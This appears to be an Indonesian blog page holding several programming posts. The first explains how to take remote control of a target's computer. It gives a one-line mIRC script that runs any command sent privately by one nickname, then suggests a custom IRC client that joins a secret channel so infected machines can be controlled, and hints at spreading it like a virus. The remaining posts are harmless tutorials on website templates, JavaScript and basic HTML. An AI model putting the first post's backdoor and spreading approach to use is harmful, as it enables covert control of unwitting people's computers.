Minggu, 30 Januari 2011

membuat program komputer untuk mengendalikan komputer jarak jauh

Membuat Program Untuk Mengendalikan Komputer Jarak Jauh melalui mIRC
Kalau dalam dunia mIRC Scripting, kita bisa membuat script yang dapat digunakan untuk mengendalikan komputer seseorang menggunakan komputer kita. Caranya adalah dengan memasukkan script semacam ini ke dalam program mIRC pada komputer target (yang ingin dikendalikan).

Inilah contoh scriptnya:
on *:text:san *:?: if ($nick == Sanji) $2-

Maksudnya adalah, jika ada seseorang yang mengirim private message yang diawali dengan kata “san” dan dilanjutkan dengan command (perintah) tertentu, maka komputer yang dipasangi script tersebut akan melakukan perintah itu.

Perintah apa saja akan dilakukannya, entah itu perintah untuk shutdown, restart, buka web, kirim file, download file, memutar mp3, dan sebagainya. Dan hanya nick “Sanji” yang bisa mengendalikan komputer tersebut :)

Tapi…
Namanya juga mIRC Script, jadi “hanya” bisa digunakan saat komputer target menjalankan program mIRC dan konek ke server tertentu. Dan si pengendali juga “harus” konek ke server yang sama, agar bisa bertemu dan mengendalikannya.

Karena…
- Script ini tidak akan berlaku jika komputer target tidak menjalankan mIRC.
- Cara memasukkan ke mIRC di komputer target tentu agak merepotkan.
- Juga bisa ketahuan jika dikirimnya melalui private message (pv-an).

Maka…
Satu-satunya cara paling mudah adalah dengan membuat program sendiri, program inilah yang berfungsi sebagai pengganti mIRC. Yaitu untuk melakukan koneksi ke server irc tertentu dan masuk ke #Channel rahasia kita. Nickname dia bisa kita setting “random” atau “memiliki aturan tertentu“.

Pastikan bahwa tidak ada orang lain yang tahu tentang #channel rahasia ini. Dengan begitu, jika ada nick-nick yang masuk ke #channel ini, berarti itu adalah komputer yang siap untuk dikendalikan.

Cara menyebarkannya?
Ini tergantung kemampuan kita dalam menjalankan “bisnis” ini. Ide-ide bisa dengan mudah kita temukan jika “mau” melihat cara kerja (penyebaran) virus.

Bagi yang suka VB, anda bisa mendapatkan Source Code “simple irc client” (pengganti mIRC) di sini, dan download juga Winsock Control di sini.

Tidak selalu “hanya” untuk keburukan…

Dengan cara yang sama, kita bisa “menghubungkan” antara komputer rumah dengan komputer di kantor, sehingga tidak perlu bolak-balik kesana-kemari jika jaraknya cukup jauh.

Bisa juga ditambahkan pada “Virus Anti Pornografi” agar bisa dikendalikan untuk meng-update database situs2 porno untuk diblokir, dan sebagainya.

Contoh aplikasi buatan saya bisa anda download di sini ^_^

Sanji
Founder of #Kudus @irc.allnetwork.org
annaufal_at_yahoo_dot_com

Ditulis dalam mIRC Scripting | Tag: annaufal, aplikasi, irc, kudus allnetwork, membuat program untuk mengendalikan komputer jarak jauh, mengendalikan komputer jarak jauh, mirc, mIRC Scripting, mIRC Scripts, program, san, sanji, script, vb

*

Sabtu, 29 Januari 2011

membuat tamplate

Membuat Template Website dengan Mudah dan Cepat

Kehadiran web generasi kedua atau web 2.0 memang membawa dampak yang cukup besar, terutama bagi para pengembang web (web developer). Web developer dituntut untuk menyajikan web application (website dll) yang senyaman mungkin bagi pengunjungnya. Salah satu faktor kenyamanan tersebut adalah dalam hal tampilan. Saat ini tampilan website di internet sangatlah beragam, pengunjung di banyak situs pun dimanjakan dengan pilihan beragam tampilan sesuai dengan kenyamanan (preferensi) masing-masing. Dari sisi pemilik (pengembang) website, sekarang pun dimanjakan dengan banyaknya pilihan template website atau tampilan situs yang dapat didapatkan dengan mudah di internet, ada yang berbayar ada pula yang gratisan. Untuk mengganti template website juga dapat dilakukan dengan cukup mudah.

Namun dengan banyaknya pilihan template website tersebut, terkadang membuat kita malah bingung sendiri, memilih tampilan yang cocok di hati. Penginnya sih bikin sendiri, tapi apa daya, terkadang kemampuan kita terbatas (curhat nih :) ). Ternyata beberapa layanan di internet menawarkan solusi bagi Anda yang ingin membuat template website sendiri namun memiliki keterbatasan kemampuan dalam hal web design. Penasaran? Yuk kita coba salah satunya dengan mengikuti langkah-langkah berikut ini.

Langkah #1. Buka Website doTemplate.com, tidak perlu login, mendaftar atau membayar alias gratis.

Langkah #2. Pilih salah satu tampilan template yang tersedia di website tersebut. Tampilan template inilah yang akan menjadi template dasar kita dan dapat kita customize (ubah) sesuai keinginan kita.

Langkah #3. Klik tombol “Customize and download” untuk melakukan pengaturan tampilan sesuai keinginan kita. Akan ditampilkan sebuah window berupa tampilan website sesuai yang kita pilih.

Langkah #4. Klik pada bagian header (gambar 2) untuk mengedit tampilan bagian header (judul situs, gambar dan background). Selanjutnya akan muncul gambar 3.
Template Website

Gambar 2. Template Website
Template website

Gambar 3. Customize bagian header

Pada gambar di atas terlihat bagian-bagian dari header website. Bagian (1) adalah judul (title) utama. Kita dapat mengganti text (tulisan), jenis font, ukuran dan warna teks. Bagian (2) adalah Slogan 1 dan Slogan 2 dimana kita juga dapat mengatur teks, jenis font, ukuran dan warnyanya. Bagian (3) adalah gambar (foreground image), kita dapat menggunakan gambar yang sudah tersedia, ataupun mengupload gambar kita sendiri. Kita juga dapat mengatur beberapa properties dari image seperti blur di sekitar image. Bagian (4) adalah warna background. Bagian (5) adalah pilihan pengaturan untuk masing-masing bagian. Bagian (6) kita dapat klik tombol “Apply” untuk melihat perubahan pengaturan.

Langkah #5. Setelah mengatur header, klik pada bagian menu (navigasi) atas dan akan ditampilkan pilihan pengaturan untuk bagian menu. Kita dapat mengatur warna background menu, warna tulisan menu dan warna hover menu. Klik Apply untuk menyimpan perubahan.
Template Website

Gambar 4. Customize bagian content

Selanjutnya lakukan hal yang sama untuk bagian website yang lain. [Gambar 4] Untuk bagian content (isi) kita dapat mengatur warna tulisan, judul tulisan dan juga warna link. Untuk mempermudah pemilihan warna, tersedia juga “font gallery” yang merupakan kombinasi warna standar web.
Template Website

Gambar 5. Customize bagian Sidebar

[Gambar 5]. Untuk bagian sidebar (menu samping) kita dapat mengatur ukuran lebar dari sidebar dalam pixel. Dapat juga diatur warna teks, warna link dan warna separator menu.
Template Website

Gambar 6. Customize Footer

[Gambar 6]. Untuk bagian footer, kita dapat mengatur tinggi dari footer serta warna teks dan link.

Langkah #6. Jika sudah selesai melakukan perubahan terhadap tampilan template (customize), klik tombol download dan file template akan didownload ke komputer kita. Terdapat 3 (tiga) pilihan format template yaitu XHTML template jika template akan kita gunakan untuk website kita sendiri (tidak menggunakan framework tertentu), Blogger template untuk mendownload template dalam format blogger dan WordPress template untuk menjadikan template compatible dengan WordPress. Sayang pada saat tutorial ini dibuat, pilihan WordPress temlate belum bisa digunakan.
Template Website
Selanjutnya file akan didownload dan siap untuk digunakan. Gampang kan?? Semoga bermanfaat.
disusun oleh bitang..

Membuat program akademik sederhana menggunakan javascript

Membuat program akademik sederhana menggunakan javascript

Lanjutan dari tulisan yang ini dan yang ini yang membahas tentang program sederhana menggunakan program java script saya sekarang akan membahas bagaimana cara membuat program akademik sederhana menggunakan javascript juga. Dan pada script yang saya buat ini juga membahas masalah prosedur dan IF. bagi anda yang sedang belajar javascript (sama dengan saya). mungkin tutorial ini bisa bermanfaat

—————code dimulai dari sini—————————-


program akademik menggunakan javascipt



Program Akademik

Jika sudah mengisi textbox Silahkan tekan tombol TAB yang ada di keyboard
Nim Nama Jurusan Nilai UTS Nilai UAS Nilai Akhir Keterangan dibuat oleh : bintang ridho maulana

membuat html

Belajar HTML yang merupakan dasar dari pembuatan website

Ini merupakan artikel pertama yang saya tulis di website saya ini. Karena diwebsite ini saya akan membagi-bagikan ilmu apa aja tentang pembuatan website, maka kita pelajari biangnya dulu, dasar dari semua dasar pembuatan website yaitu HTML.

HTML (Hypertext Markup Language) merupakan bahasa yang digunakan untuk membuat website. Menggunakan tag untuk mendeklarasikan sesuatu dan tag tersebut tidak ditampilkan tetapi tag tersebut memberi tahu browser bagaimana cara menampilkan dokumen website. Serta dapat saling berhubungan dengan dokumen HTML lain yang dikenal dengan istilah link.

Suatu halaman website sebenarnya hanya sebuah halaman teks, jika anda menggunakan browser internet explorer dan anda mengklik view - source, maka anda dapat melihat teks dari web tersebut. Tetapi teks tersebut diterjemahkan oleh browser menjadi halaman website yang enak dilihat. Teks merupakan bahasa universal bagi komputer, yang berarti setiap dokumen teks (termasuk website) yang anda buat melalui Windows dapat dibaca di sistem perasi lain seperti Mac OS, Linux, Unix dan lainnya.

HTML dan hal-hal yang berkaitan dengan website distandarisasi oleh sebuah badan yang disebut World Wide Web Consortium (W3C). Standard terbaru, konsep dan proposal mengenai starndarisasi web dapat dilihat di http://www.w3.org. Standar untuk HTML terbaru adalah HTML 4.0 yang telah didukung oleh bermacam-macam browser seperti Microsoft Internet Explorer, Netscape Navigator, Opera, Mozilla, Safari dan masih banyak lagi. Browser menterjemahkan tag yang terdapat pada dokumen HTML. Kita akan segera membicarakan mengenai tag.

Suatu halaman web merupakan file teks yang berarti anda dapat membuatnya hanya dengan menggunakan notepad saja. Bahkan jika anda masih pertama kali mempelajari HTML, notepad merupakan alat yang tepat. Saya menyarankan untuk menggunakan editplus karena menurut saya enak aja dipakainya, tetapi anda bebas menggunakan teks editor lain.
Jika anda baru pertama kali mengenal HTML, hindari Program WYSIWIG (What You See Is What You Get) seperti Dreamweaver atau Frontpage/Web Expression. Program-program ini memang memudahkan anda membuat website tetapi anda akan kurang memahami HTML, gunakan Frontpage atau Dreamweaver apabila anda sudah paham mengenai HTML.

Sekarang buka saja notepad anda dan kita mulai.
Kode HTML pertama

Buka notepad dan tuliskan kode dibawah ini

Hello World

Simpan file tersebut dengan nama hello.html didalam suatu folder (misal c:\webku) dan buka file HTML tersebut dengan browser kesukaan anda. Hasilnya seperti ini:

Hello World!!

Oke jadi apa yang dimaksud oleh "<" dan ">", ketika anda menuliskan sesuatu diantara tanda "<" dan ">" maka anda membuat sesuatu yang disebut dengan tag, kalau anda lihat dikamus bahasa inggris tag artinya tanda/label. Sebagai contoh tag maksudnya untuk memulai huruf tebal (bold) dan tag merupakan tag penutup untuk menghentikan huruf tebal.

Sebuah halaman HTML yang baik harus memiliki tag dan , tapi kita akan membicarakan masalah ini belakangan. Yang penting sekarang pahami dulu mengenai tag HTML. Sekarang akan kita pelajari lebih jauh mengenai tag HTML.

Tag HTML dibagi menjadi dua, yaitu tag HTML yang memiliki penutup (containers) atau yang berdiri sendiri (standalone).
Containers

Kebanyakan tag HTML adalah containers (kita sebut containers saja sebab sulit mencari terjemahannya dalam bahasa Indonesia) yang berarti tag tersebut memiliki pembuka (batas awal) dan penutup (batas akhir). Teks yang berada diantara tag pembuka dan penutup akan berubah sesuai dengan fungsi dari tag tersebut. Perhatikan contoh berikut:

Hello World!!


Hasil:

Hello World!!

Tag berguna untuk memiringkan teks (italic) tag memiliki penutup yaitu . Tag penutup selalu ditandai dengan "/". Contoh diatas terdapat teks World!! diantara tag pembuka dan tag penutup sehingga menghasilkan tulisan World!! yang miring. Tag pembuka memiliki atribut tetapi tag penutup tidak memiliki atribut.
Standalone Tag

Beberapa tag tidak memerlukan penutup sebab tag tersebut hanya berfungsi untuk menempatkan sebuah elemen pada halaman web. Sebagai contoh tag yang merupakan tag untuk memasang sebuah gambar didalam halaman web. Tag lain yang tidak memiliki penutup adalah
yang berguna untuk memberi jarak antar teks dan tag
untuk memberi garis. Tag HTML cukup banyak jumlahnya, anda dapat mencarinya dibuku-buku atau mencarinya melalui google untuk mengetahui apa saja jenis tag HTML. Tapi saya akan beritahu yangpenting-penting saja.
Atribut

Atribut dipasang didalam tag pembuka untuk menambahkan fungsi dari tag tersebut. Setiap tag memiliki beberapa atribut dan dipasang sesudah nama tag dibatasi oleh spasi. Urutan atribut tidak perlu diperhatikan. Kebanyakan atribut memiliki nilai yang dipanggil dengan menggunakan tanda "=" sesudah nama atribut. Bingung? coba kode berikut ini dijamin anda mengerti:

Hello World!!

Hasilnya:

Hello World!!

Tulisan World!! terletak ditengah tag nah tag memiliki atribut face, size dan color yang dapat anda ubah nilainya. Cobalah untuk mengubah ukuran (size) menjadi 3 atau jenis fontnya ubahlah dari verdana menjadi arial. Kira-kira seperti itu kegunaan atribut. Bagaimana? lanjut?
HTML Entity

Jika anda ingin menuliskan karakter khusus dalam web, maka anda perlu menulisnya menggunakan kode khusus. Kode khusus ini dikenal dengan istilah HTML entity. Sebagai contoh anda ingin menulis seperti ini:

Saya belajar web

Anda lihat ada jarak spasi antara belajar dan web. Anda tidak bisa membuat spasi dengan menekan tombol space bar berkali-kali. Meskipun pada kode HTML hasilnya terdapat jarak namun browser hanya membacanya sekali, jadi sebanyak apapun space bar yang tekan browser hanya membacanya satu spasi. Lalu bagaimana caranya? Spasi dalam HTML memiliki kode HTML entity yaitu   jadi untuk membuat seperti contoh diatas anda perlu menulisnya seperti ini:

Saya belajar    web

HTML entity selalu diawali dengan "&" dan diakhiri dengan ";" ada banyak sekali HTML entity anda dapat mencarinya, dan lagi-lagi saya akan menyuruh anda mencarinya sendiri melalui google.
Struktur Dokumen HTML

Tadi sudah saya katakan bahwa HTML yang baik memiliki tag dan . mendefiniskan bagian header dari dokumen HTML yang berisi informasi mengenai dokumen HTML tersebut. Tag tidak memiliki atribut tetapi memiliki container khusus didalam header seperti , , dan . Tag <body> mendefinisikan awal dari isi website dan ditutup dengan </body>. Tag <body> berisi isi dokumen yang akan tampil di browser anda. Oke sekarang cobalah kode berikut ini:<br /> <br /> <html><br /> <head><br /> <title>Your title


Hello World!!



Hasilnya didalam Microsoft Internet Explorer :
Contoh HTML dasar

Anda lihat teks yang berada diantara tag muncul dibagian atas browser. Apapun yang anda tulis diantara tag <body> akan muncul sebagai isi dari website anda. Jika anda lihat terdapat tag <body bgcolor="#cccccc"> bgcolor merupakan atribut dari <body> yang berguna untuk memberi warna pada background halaman website. Pelajari dan pahami kode tersebut maka anda akan mudah untuk mempelajari kode selanjutnya.<br /> Susun file Anda<br /> <br /> Sangat penting untuk meletakkan file-file HTML anda. Akan lebih baik jika anda membuat folder untuk meletakkan file-file HTML dan didalamnya anda membuat subfolder (misalnya images) untuk menyimpan file-file gambar. Semakin sering anda membuat website anda akan semakin berpengalaman dan mengetahui teknik dalam menyusun file. Jadi ini tergantung pengalaman anda.<br /> index.html<br /> <br /> Ketika anda membuka dhimasronggobramantyo.com/belajar.html maka otomatis browser akan membuka file belajar.html. Tetapi jika kita membuka dhimasronggobramantyo.com saja, file apa yang dibuka? Semua server web otomatis akan mencari file index.html.<br /> <br /> Karena itu jika website anda memiliki banyak halaman, anda harus memiliki sebuah file index.html yang akan menjadi halaman pertama dari website anda.<br /> <br /> Oke, sekarang kita pelajari tag-tag HTML yang penting. Semua kode HTML berikut ini harus ditulis didalam tag <body><br /> Teks dan Paragraf<br /> <br /> Header/judul akan membuat mata pembaca tertuju pada judul dan tertarik untuk membacanya. Dengan menggunakan tag heading maka search engine dapat membaca seberapa penting isi dari suatu website.<br /> <br /> Heading merupakan container yang diawali dengan tag <h1>dan ditutup dengan tag </h1>. Ada 6 level heading mulai dari h1 sampai h6.<br /> <br /> Cobalah kode berikut ini:<br /> <br /> <h1>My First HTML</h1><h2>My First HTML</h2><h3>My First HTML</h3><h4>My First HTML</h4><h5>My First HTML</h5><h6>My First HTML</h6><br /> Hasil:<br /> Contoh penggunaan tag Heading<br /> <br /> Saya rasa anda dapat dengan mudah memahami kode tersebut, sekarang kita coba tag HTML penting lainnya. <p>digunakan untuk membuat paragraf, ini merupakan salah satu tag yang banyak digunakan, tag penting lainnya adalah <b> untuk menebalkan,<i> untuk memiringkan dan <u> untuk garis bawah<br /> <br /> Sekarang coba kode berikut ini:<br /> <br /> <p>Halo, nama saya <b>Budi</b> dan <br /> saya ingin belajar HTML.</p><p>Ini merupakan <i>kode HTML pertama saya</i> dan saya <br /> belajar untuk <u>memformat</u> teks dalam HTML </p><br /> Bagaimana hasilnya? silahkan anda coba sendiri, jika anda selalu melihat contoh dihalaman ini, anda tidak akan mencoba :)<br /> <br /> Beberapa tag mempunyai atribut ALIGN, termasuk <p>dan <h1>- <h6>. ALIGN berguna untuk membuat teks rata kiri, tengah atau kanan. Cobalah kode berikut:<br /> <br /> <h1 align="center">Nama saya Jono</h1><p>Halo nama saya Jono dan saya lagi belajar HTML</p><p align="right">James, 2006</p><br /> Hasilnya:<br /> Contoh penggunaan Alignment<br /> <br /> Anda dapat mengubah jenis huruf, ukuran dan warna. Untuk mengubah huruf digunakan tag <font>, tag <font> memiliki atribut seperti face, size dan color. Contoh:<br /> <br /> <p><font face="Arial" size="2" color="#FF0000">Nama <br /> saya</font><br /> <b>Bambang</b><font face="Arial" size="2"> <br /> dan </font><font face="Tahoma">saya cinta rupiah</font></p><br /> Silahkan anda coba sendiri untuk melihat seperti apa hasilnya<br /> <br /> Didalam HTML, untuk memberi jarak anda tidak bisa hanya menekan "enter" saja. Untuk memberi jarak perbaris kita perlu tag HTML yaitu <br> sedangkan untuk spasi seperti yang sudah saya jelaskan tadi, kita perlu menggunakan HTML entity / character entity, untuk spasi character entitynya adalah  . Langsung saja coba kode berikut ini:<br /> <br /> <p>Baris 1<br>Baris 2<br>Baris     3<br>Baris <br /> <b>4</b></p><br /> Hasil:<br /> <br /> Baris 1<br /> Baris 2<br /> Baris 3<br /> Baris 4<br /> <br /> Untuk memberikan garis horisontal digunakan tag <hr>. Tag <hr>memiliki beberapa atribut. Tag <hr>tidak memerlukan tag penutup jadi tag <hr>merupakan standalone tag. Coba contoh berikut ini:<br /> <br /> <p>Halo nama saya Telo</p><hr width="25%" align="justify"><p>Saya lagi belajar membuat garis horisontal.</p><hr size="4" align="justify"><p>Matur nuwun</p><hr size="3" noshade color="#000000" width="25%" align="justify"><br /> Hasil:<br /> Contoh penggunaan Horizontal Rules<br /> <br /> Seperti yang anda lihat, anda bisa memasang banyak atribut dalam satu tag. Pada tag <hr>terdapat atribut yang tidak memiliki nilai yaitu noshade. Memang dalam beberapa tag HTML terdapat atribut-atribut yang tidak memiliki nilai. Salah satunya adalah noshade yang berarti menghilangkan bayangan pada garis. Anda dapat melihat perbedaan tag <hr>yang menggunakan noshade dengan yang tidak pada kode diatas.<br /> <br /> Bagaimana? mudah kan belajar HTML, jangan senang dulu sekarang kita akan mempelajari yang lebih sulit<br /> Links<br /> <br /> Oke anda telah membuat banyak halaman HTML, sekarang bagaimana caranya anda berpindah dari satu halaman ke halaman yang lain? Apakah saya perlu menuliskan alamatnya di browser? Link adalah jawabannya. <a> merupakan tag HTML untuk membuat link agar kita dapat berpindah ke h<br /> <br /> alaman lain. Tag <a> memiliki atribut yang sangat penting yaitu href. Langsung saja coba kode berikut ini:<br /> <br /> My <a href="http://www.dhimasronggobramantyo.com">Homepage</a><br /> <br /> Hasil:<br /> <br /> My homepage<br /> <br /> Jika anda lihat, maka teks homepage telah berubah menjadi link, jika anda klik maka browser akan menuju alamat yang tertera pada atribut href. Sekarang jika anda memiliki banyak file HTML dalam satu folder, apakah saya perlu menggunakan http:// untuk melinknya? tentu tidak anda cukup menulis nama filenya saja, asalkan file tersebut berada satu folder dengan file yang berisi link. Contoh:<br /> <br /> My <a href="contact.html">homepage</a><br /> <br /> Hasil:<br /> <br /> My homepage<br /> <br /> Jika anda klik, maka browser akan membuka file contact.html yang berada pada satu folder. Bagaimana jika filenya berada difolder lain? gampang, gunakan kode berikut:<br /> <br /> My <a href="folder/contact.html">homepage</a><br /> <br /> Hasil:<br /> <br /> My homepage<br /> <br /> Jika anda ingin ketika link diklik dan halaman tersebut muncul pada jendela browser yang baru, gunakan atribut target="_blank" seperti ini:<br /> <br /> My <a href="http://www.dhimasronggobramantyo.com" target="_blank">homepage</a><br /> <br /> Oke silahkan anda coba sendiri untuk melihat hasilnya, sekarang kita akan belajar tentang images<br /> Images<br /> <br /> Pertengahan tahun 90'an website-website yang ada tidak memiliki gambar, karena browser yang ada tidak memiliki kemampuan untuk menampilkan gambar. Tetapi sekarang website tanpa gambar akan terlihat membosankan, tetapi website dengan banyak gambar akan terlihat menyebalkan, nah lo. Jadi gunakan gambar seperlunya, keluarkan semua imajinasi dan nilai seni anda untuk dapat membuat website yang nyaman dilihat. Saya tidak akan mengajarkan bagaimana cara membuat gambar disini, ada kategori lain diwebsite ini untuk belajar mendesain, anda dapat belajar menggunakan Photoshop. Gambar yang dipasang di website disarankan menggunakan bertipe file gif atau jpg. Untuk memasang image anda memerlukan tag <img>. Tag <img> tidak memerlukan penutup dan memiliki atribut src untuk mengambil gambar dari suatu alamat. Coba contoh berikut ini:<br /> <br /> <img src="images/artikel/introhtml_02.gif" width="313" height="43" alt="Contoh Gambar"><br /> <br /> Hasil:<br /> Contoh Gambar<br /> <br /> Atribut src disini sama dengan atribut href pada tag <a> yang berisi alamat posisi gambar. Pada contoh kode diatas anda memiliki gambar introhtml_02.gif yang berada pada folder images. Jika anda tidak memiliki file tersebut maka gambar tidak ditampilkan. Atribut width dan height merupakan opsional, tapi saya sarankan untuk mencantumkannya agar browser mengetahui ukuran gambar apabila gambar gagal ditampilkan. Atribut alt berguna untuk menampilkan teks pada gambar jika gambar gagal ditampilkan atau belum selesai ditampilkan. Anda dapat memberikan garis tepi pada gambar dengan menambahkan atribut border<br /> <br /> <a href="http://www.dhimasronggobramantyo.com"><br /> <img border="1" src="images/introhtml_02.gif" width="313" height="43"></a><br /> <br /> Hasil:<br /> <br /> Contoh Gambar<br /> Komentar<br /> <br /> Anda dapat menuliskan komentar dikode HTML, komentar berguna apabila anda ingin kembali mengutak-atik kode maka anda ingat kode tersebut fungsinya apa. Komentar hanya untuk memudahkan anda saja. Komentar tidak ditampilkan oleh browser. Untuk menulis komentar diawali dengan <!-- dan diakhiri dengan --> lihat contoh berikut ini:<br /> <br /> <!--Kode untuk menampilkan nama saya--><br /> <p>Nama saya <b>Dhimas</b></p><br /> List<br /> <br /> Tag list berguna untuk menampilkan list-list. Ada 3 macam jenis list pada HTML. Yang pertama adalah Unordered List <ul>: <ul> <li>List 1</li> <li>List 2</li> <li>List 3</li> </ul> Hasil: * List 1 * List 2 * List 3 Tag <ul>merupakan tag pembuka. Diantara tag <ul>Anda dapat menambahkan tag <li> untuk setiap list yang akan ditampilkan. Tag list lainnya adalah Ordered List <ol>Anda dapat menggunakannya sama seperti tag <ul>Contoh: <ol> <li>List 1</li> <li>List 2</li> <li>List 3</li> </ol> Hasil: 1. List 1 2. List 2 3. List 3 Jika anda ingin memulai list tidak dari nomor satu tambahkan atribut start. Contoh: <ol start="3"> <li>List 1</li> <li>List 2</li> <li>List 3</li> </ol> Hasil: 3. List 1 4. List 2 5. List 3 Tabel merupakan hal yang paling penting dalam membuat interface website anda. Dengan tabel anda dapat memecah layout website menjadi beberapa kolom atau baris. Dengan tabel halaman website anda akan lebih rapih. Table merupakan tag html terumit, karena didalam tag table terdapat tag-tag lainnya. Dan table sangat penting. Karena itu sebelum meneruskan, tarik nafas dalam-dalam dan konsentrasi. Untuk membuat tabel maka diperlukan tag-tag dasar seperti ini : * <TABLE></TABLE>--Tag ini merupakan containers untuk membuat tabel. * <TR></TR>--Didalam tabel tag ini berfungsi untuk membuat baris. * <TD></TD>--Tag untuk membuat kolom. didalam tag <tr> harus terdapat tag <td>, anda bisa menambahkan banyak tag <td> didalam <tr> untuk membuat kolom.<br /> * <TH></TH>--Sama dengan <td> hanya saja berfungsi sebagai header, biasanya digunakan pada baris pertama didalam tabel.<br /> <br /> Setiap tag tabel tersebut memiliki banyak atribut. Oke langsung saja coba kode berikut ini:<br /> <br /> Contoh:<br /> <br /> <table border="1" width="60%"><tr> <td>Contoh Table</td> </tr> </table><br /> Hasilnya:<br /> <br /> Contoh Tabel<br /> <br /> Tabel diawali dengan tag <table>dan biasanya memiliki atribut border. Jika border="0" maka garis pada tabel tidak ditampilkan. Biasanya jika kita tidak menampilkan atribut border maka otomatis tabel tersebut juga tidak memiliki garis. <table>memiliki atribut cellpadding untuk memberi jarak didalam kolom dan cellspacing untuk memberi jarak antara kolom. Coba kode berikut ini: <table border="1" width="200" cellpadding="4" cellspacing="5"><tr> <td width="100">Cell 1</td> <td width="100">Cell 2</td> </tr> </table> Hasil: Cell 1 Cell 2 Coba anda ubah nilai dari atribut cellpadding dan cellspacing untuk melihat perbedaannya, cobalah untuk mengutak-atik kode diatas dengan mengubah nilai-nilai atributnya. Setiap tabel memiliki baris dengan menggunakan tag <tr>. Didalam baris perlu sebuah kolom atau lebih, kolom dibuat dengan menggunakan tag <td>. Untuk lebih jelasnya cobalah kode berikut ini:<br /> <br /> <table border="1" width="200" cellpadding="2"> <tr> <td width="100" align="center" bgcolor="#C0C0C0"><b>Header</b></td> <td width="100" align="center" bgcolor="#C0C0C0"><b>Header</b></td> / </tr> <tr> <td width="100">cell 1</td> <td width="100">cell 2</td> </tr> <tr> <td width="100">cell 3</td> <td width="100">cell 4</td> / </tr> </table><br /> Hasil:<br /> <br /> Header<br /> <br /> <br /> Header<br /> <br /> cell 1<br /> <br /> <br /> cell 2<br /> <br /> cell 3<br /> <br /> <br /> cell 4<br /> <br /> Bagaimana anda mengerti maksudnya kode diatas, coba anda pahami dulu. Pada kode diatas terdapat atribut bgcolor yang berguna untuk memberi warna pada background. Didalam kolom <td> anda dapat menuliskan kode HTML apa saja, bahkan anda dapat memasang tag <table>didalamnya, yang berarti anda memasang tabel didalam tabel. Contoh lainnya: <table border="1" width="200" cellpadding="2"><tr> <td width="100" align="center" bgcolor="#C0C0C0"><b>Header</b></td> <td width="100" align="center" bgcolor="#C0C0C0"><b>Header</b></td> </tr> <tr> <td width="100" rowspan="2" valign="top">cell 1</td> <td width="100">cell 2</td> </tr> <tr> <td width="100">cell 4</td> </tr> </table> Hasilnya: Header Header cell 1 cell 2 cell 4 Anda lihat ada atribut rowspan="2" ini berguna untuk menggabungkan 2 baris menjadi satu, jika anda ingin menggabungkan lebih dari 2 baris, ubah saja nilainya. Bagaiman susah? coba anda pelajari terus. Jika sudah coba anda pahami kode berikut ini: <table border="0" width="200" cellpadding="2" cellspacing="1" bgcolor="#000000"><tr> <td width="100" align="center" bgcolor="#C0C0C0"><b>Header</b></td> <td width="100" align="center" bgcolor="#C0C0C0"><b>Header</b></td> </tr> <tr> <td width="100" valign="top" bgcolor="#CCCCCC" align="left">Left</td> <td width="100" bgcolor="#CCCCCC" align="right">Right</td> </tr> <tr> <td width="200" valign="top" colspan="2" bgcolor="#FFFFFF" align="center"><br /> Table is cool</td> </tr> <tr> <td width="200" valign="top" colspan="2" bgcolor="#FFFFFF" align="center"><br /> But it's not easy</td> </tr> </table> Hasil: Header Header Left Right Table is cool But it's not easy Anda sudah mengetahui dasar-dasar HTML. Masih banyak lagi tag-tag HTML lainnya seperti frames dan form. Saya akan mengajarkan frames diartikel lainnya, tetapi frames harus dihindari dalam membuat website, alasan utama apa yang ada didalam frames tidak terbaca oleh Search Engine. Tag form hanya dibutuhkan apabila anda membuat website dinamis menggunakan bahasa pemrograman web seperti PHP, ASP, Perl atau JSP. Sekarang kita akan membicarakan tag <META>. Tag <META> digunakan agar search engine mengenal dan dapat mengkategorisasikan website anda, gampangnya agar search engine mengetahui website anda isinya tentang apa. Tetapi tidak semua search engine membaca tag <META> tetapi sebagian besar membaca tag ini, jadi kita perlu menyertakannya pada website kita. Tag <META> berada diantara tag <head> bukan <body> yang berarti isi tag tersebut tidak ditampilkan dibrowser. Sebenarnya apa sih kegunaan Search Engine dan apa pengaruhnya untuk website? Saya akan jelaskan secara gampang, anda memiliki website katakan websitesaya.com, nah bagaiman milyaran pengguna internet dapat mengetahui kalau ada sebuah situs websitesaya.com diantara ratusan juta situs lainnya. Pengguna internet banyak yang melakukan pencarian melalui search engine seperti google atau yahoo. Jika mereka melakukan pencarian dan situs anda muncul pada hasil pencarian tersebut, maka anda mendapatkan pengunjung yang mengunjungi website anda. Bagaimana agar website saya ada di google atau search engine lainnya? ya dengan menggunakan <META> maka search engine akan mengenali website anda. Sebenarnya prosesnya jauh lebih rumit, search engine memiliki perhitungannya sendiri seperti ranking, backlink, recipocal link, tetapi kita ambil gampangnya saja. Oke anda sudah mengerti pentingnya tag <META>Tag <META> memiliki atribut yang paling penting Keywords dan DESCRIPTION dimana kita memasukkan deskripsi dan kata kunci yang berhubungan dengan website kita. Sebagai contoh misalnya kita memiliki website kecoak.com yang berisi bagaimana cara memelihara dan beternak kecoa. Maka kira-kira kita perlu membuat meta seperti ini: <html> <head> <META content="kecoak.com" name=AUTHOR> <META content="Cara memelihara dan beternak kecoak." name=description> <META content="kecoak, beternak, memelihara, coro, ternak, pelihara" name=keywords> <META content="INDEX, FOLLOW" name=ROBOTS> <META http-equiv="Content-Language" content="en-us"> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>Ternak Kecoak Kira-kira seperti itu, ok anda telah mempelajari HTML, sekarang anda tinggal turun gunung dan mempraktekkan apa yang sudah dipelajari. Teruslah mencoba agar anda semakin ahli.

tahap membuat program dengan baik

Tahapan membuat program dengan baik

cowboy-coding image from unix-ag.uni-kl.deDengan kemajuan teknologi keinginan dan kebutuhan akan informasi semakin meningkat juga, apalagi sekarang mulai masuk era online, era cepat saji, sehingga kebutuhan akan data dan informasi yang cepat saji menjadi keinginan mutlak pimpinan,institusi bahkan client kita. Untuk itu perancanagn sistem atau program untuk memenuhi kebutuhan tersebut harus dirancang dengan baik dan tepat, apalagi sekarang banyak pemimpin yang sebenarnya tidak mengetahui seluk beluk dari sistem/program tapi berani memutuskan untuk merancang dan menyediakan sistem/program tersebut dalam waktu yang singkat. Bahkan menganggap membuat program seperti kayaknya menggoreng tempe yang menunggu minyak panas tempe dimasukkan, dibolak-balik dah jadi tidak sampai 30 dah jadi. Berdeda dengan prorgram dah jadi yang sudah menjadi produk masal, tidak membutuhkan modifikasi. kalau itu tinggal membeli cd program dah jadi tersebut sehingga  tidak usah memerlukan analisis lagi karena programnya dah jadi dan ndak bisa/perlu di modif.
